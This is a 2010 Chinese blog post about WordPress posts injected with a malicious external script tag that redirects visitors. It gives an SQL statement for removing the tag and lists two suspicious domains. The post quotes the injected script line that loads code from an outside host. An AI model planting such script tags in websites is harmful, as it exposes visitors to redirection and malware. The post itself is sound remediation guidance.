WordPress重定向漏洞
浏览:3294次 出处信息
今天访问自己blog时突然发现特慢,半天右栏都没加载出来。看了下状态栏,发现卡在一个url上过不去(http://ae.awaue.com/7),我想了又想,重来没有调用过外站资源,特别时这个陌生的站。第一反应就是可能被挂马了,上网查了一下没有太具体的说法,访问了下上面这个url也打不开,心生可疑。因为首页里只发现两条如下脚本,想实在没有方法解决,就先干掉这两个,过段时间看看情况。
<script src="http://ae.awaue.com/7"></script>
症状:
- 浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的)
- 也可能被重定向到googlesearch.com,不过这个已被禁用。
但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。
解决方案如下,范讲一下,不只针对(mt)主机:
- 登录你主机的管理后台,进入数据库管理,也就是mysqladmin
- 在左边列表里找到你的wordpress所在数据库,如db_blog
- 点击进入后,在顶部找到”SQL”一项,点击
- 然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息:
UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')
- 接下来运行这段语句
- 最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条……
需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。
目前已发现的可疑脚本有以下两个:
- ae.awaue.com/7
- ie.eracou.com/3
如果未来发现有新的可疑脚本,请随时留意这里的更新
建议继续学习:
- WordPress评论翻页造成404页面的解决方案 (阅读:8088)
- WordPress插件开发 -- 在插件使用数据库存储数据 (阅读:5722)
- WordPress安全建议 (阅读:5454)
- WordPress插件开发--获知文章状态变化 (阅读:4666)
- WordPress数据字典 (阅读:4198)
- SEO:wordpress页面标记优化 (阅读:3647)
- WordPress模板的image.php (阅读:3727)
- wordpress博客优化12条 (阅读:2944)
- SEO:wordpress相同内容网页优化 (阅读:2954)
- 简单好用的土办法抗击洋鬼子对wordpress系统的广告灌入 (阅读:2912)
QQ技术交流群:445447336,欢迎加入!
扫一扫订阅我的微信号:IT技术博客大学习
扫一扫订阅我的微信号:IT技术博客大学习
<< 前一篇:Flash应用安全规范
后一篇:U盘Autorun.inf文件现象解析 >>
文章信息
- 作者:波希米亚 来源: B3 bohemia's
- 标签: WordPress 重定向
- 发布时间:2010-07-18 23:37:32
建议继续学习
近3天十大热文
- [68] Twitter/微博客的学习摘要
- [66] IOS安全–浅谈关于IOS加固的几种方法
- [64] android 开发入门
- [64] 如何拿下简短的域名
- [62] find命令的一点注意事项
- [61] Go Reflect 性能
- [60] 流程管理与用户研究
- [59] Oracle MTS模式下 进程地址与会话信
- [58] 图书馆的世界纪录
- [56] 读书笔记-壹百度:百度十年千倍的29条法则